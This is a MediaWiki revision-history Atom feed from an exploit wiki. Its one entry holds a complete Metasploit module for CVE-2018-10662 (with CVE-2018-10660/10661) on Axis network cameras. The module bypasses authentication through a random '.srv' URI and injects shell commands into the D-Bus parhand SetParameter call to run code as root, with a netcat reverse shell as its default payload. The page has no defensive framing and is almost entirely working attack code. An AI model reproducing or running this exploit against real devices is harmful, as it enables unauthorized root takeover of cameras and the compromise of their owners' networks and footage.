<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-10662_Axis_Network_Camera_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-10662 Axis Network Camera 遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-10662_Axis_Network_Camera_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-10662_Axis_Network_Camera_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T06:16:49Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-10662_Axis_Network_Camera_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1517&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitModule...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-10662_Axis_Network_Camera_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1517&amp;oldid=prev"/>
		<updated>2021-04-11T01:31:50Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitModule...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# This module requires Metasploit: https://metasploit.com/download&lt;br /&gt;
# Current source: https://github.com/rapid7/metasploit-framework&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
class MetasploitModule &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
&lt;br /&gt;
  Rank = ExcellentRanking&lt;br /&gt;
&lt;br /&gt;
  include Msf::Exploit::Remote::HttpClient&lt;br /&gt;
  #include Msf::Exploit::CmdStager&lt;br /&gt;
&lt;br /&gt;
  def initialize(info = {})&lt;br /&gt;
    super(update_info(info,&lt;br /&gt;
      'Name'           =&amp;gt; 'Axis Network Camera .srv to parhand RCE',&lt;br /&gt;
      'Description'    =&amp;gt; %q{&lt;br /&gt;
        This module exploits an auth bypass in .srv functionality and a&lt;br /&gt;
        command injection in parhand to execute code as the root user.&lt;br /&gt;
      },&lt;br /&gt;
      'Author'         =&amp;gt; [&lt;br /&gt;
        'Or Peles',       # Vulnerability discovery (VDOO)&lt;br /&gt;
        'wvu',            # Metasploit module&lt;br /&gt;
        'sinn3r',         # Metasploit module&lt;br /&gt;
        'Brent Cook',     # Metasploit module&lt;br /&gt;
        'Jacob Robles',   # Metasploit module&lt;br /&gt;
        'Matthew Kienow', # Metasploit module&lt;br /&gt;
        'Shelby Pace',    # Metasploit module&lt;br /&gt;
        'Chris Lee',      # Metasploit module&lt;br /&gt;
        'Cale Black'      # Metasploit module&lt;br /&gt;
      ],&lt;br /&gt;
      'References'     =&amp;gt; [&lt;br /&gt;
        ['CVE', '2018-10660'],&lt;br /&gt;
        ['CVE', '2018-10661'],&lt;br /&gt;
        ['CVE', '2018-10662'],&lt;br /&gt;
        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],&lt;br /&gt;
        ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']&lt;br /&gt;
      ],&lt;br /&gt;
      'DisclosureDate' =&amp;gt; 'Jun 18 2018',&lt;br /&gt;
      'License'        =&amp;gt; MSF_LICENSE,&lt;br /&gt;
      'Platform'       =&amp;gt; ['unix'],# 'linux'],&lt;br /&gt;
      'Arch'           =&amp;gt; [ARCH_CMD],# ARCH_ARMLE],&lt;br /&gt;
      'Privileged'     =&amp;gt; true,&lt;br /&gt;
      'Targets'        =&amp;gt; [&lt;br /&gt;
        ['Unix In-Memory',&lt;br /&gt;
         'Platform'    =&amp;gt; 'unix',&lt;br /&gt;
         'Arch'        =&amp;gt; ARCH_CMD,&lt;br /&gt;
         'Type'        =&amp;gt; :unix_memory,&lt;br /&gt;
         'Payload'     =&amp;gt; {&lt;br /&gt;
           'BadChars'  =&amp;gt; ' ',&lt;br /&gt;
           'Encoder'   =&amp;gt; 'cmd/ifs',&lt;br /&gt;
           'Compat'    =&amp;gt; {'PayloadType' =&amp;gt; 'cmd', 'RequiredCmd' =&amp;gt; 'netcat-e'}&lt;br /&gt;
         }&lt;br /&gt;
        ],&lt;br /&gt;
=begin&lt;br /&gt;
        ['Linux Dropper',&lt;br /&gt;
         'Platform'    =&amp;gt; 'linux',&lt;br /&gt;
         'Arch'        =&amp;gt; ARCH_ARMLE,&lt;br /&gt;
         'Type'        =&amp;gt; :linux_dropper&lt;br /&gt;
        ]&lt;br /&gt;
=end&lt;br /&gt;
      ],&lt;br /&gt;
      'DefaultTarget'  =&amp;gt; 0,&lt;br /&gt;
      'DefaultOptions' =&amp;gt; {'PAYLOAD' =&amp;gt; 'cmd/unix/reverse_netcat_gaping'}&lt;br /&gt;
    ))&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def exploit&lt;br /&gt;
    case target['Type']&lt;br /&gt;
    when :unix_memory&lt;br /&gt;
      execute_command(payload.encoded)&lt;br /&gt;
=begin&lt;br /&gt;
    when :linux_dropper&lt;br /&gt;
      execute_cmdstager&lt;br /&gt;
=end&lt;br /&gt;
    end&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def execute_command(cmd, opts = {})&lt;br /&gt;
    rand_srv = &amp;quot;#{Rex::Text.rand_text_alphanumeric(8..42)}.srv&amp;quot;&lt;br /&gt;
&lt;br /&gt;
    send_request_cgi(&lt;br /&gt;
      'method'    =&amp;gt; 'POST',&lt;br /&gt;
      'uri'       =&amp;gt; &amp;quot;/index.html/#{rand_srv}&amp;quot;,&lt;br /&gt;
      'vars_post' =&amp;gt; {&lt;br /&gt;
        'action'  =&amp;gt; 'dbus',&lt;br /&gt;
        'args'    =&amp;gt; dbus_send(&lt;br /&gt;
          method: :set_param,&lt;br /&gt;
          param:  &amp;quot;string:root.Time.DST.Enabled string:;#{cmd};&amp;quot;&lt;br /&gt;
        )&lt;br /&gt;
      }&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
    send_request_cgi(&lt;br /&gt;
      'method'    =&amp;gt; 'POST',&lt;br /&gt;
      'uri'       =&amp;gt; &amp;quot;/index.html/#{rand_srv}&amp;quot;,&lt;br /&gt;
      'vars_post' =&amp;gt; {&lt;br /&gt;
        'action'  =&amp;gt; 'dbus',&lt;br /&gt;
        'args'    =&amp;gt; dbus_send(method: :synch_params)&lt;br /&gt;
      }&lt;br /&gt;
    )&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def dbus_send(method:, param: nil)&lt;br /&gt;
    args = '--system --dest=com.axis.PolicyKitParhand ' \&lt;br /&gt;
           '--type=method_call /com/axis/PolicyKitParhand '&lt;br /&gt;
&lt;br /&gt;
    args &amp;lt;&amp;lt;&lt;br /&gt;
      case method&lt;br /&gt;
      when :set_param&lt;br /&gt;
        &amp;quot;com.axis.PolicyKitParhand.SetParameter #{param}&amp;quot;&lt;br /&gt;
      when :synch_params&lt;br /&gt;
        'com.axis.PolicyKitParhand.SynchParameters'&lt;br /&gt;
      end&lt;br /&gt;
&lt;br /&gt;
    args&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>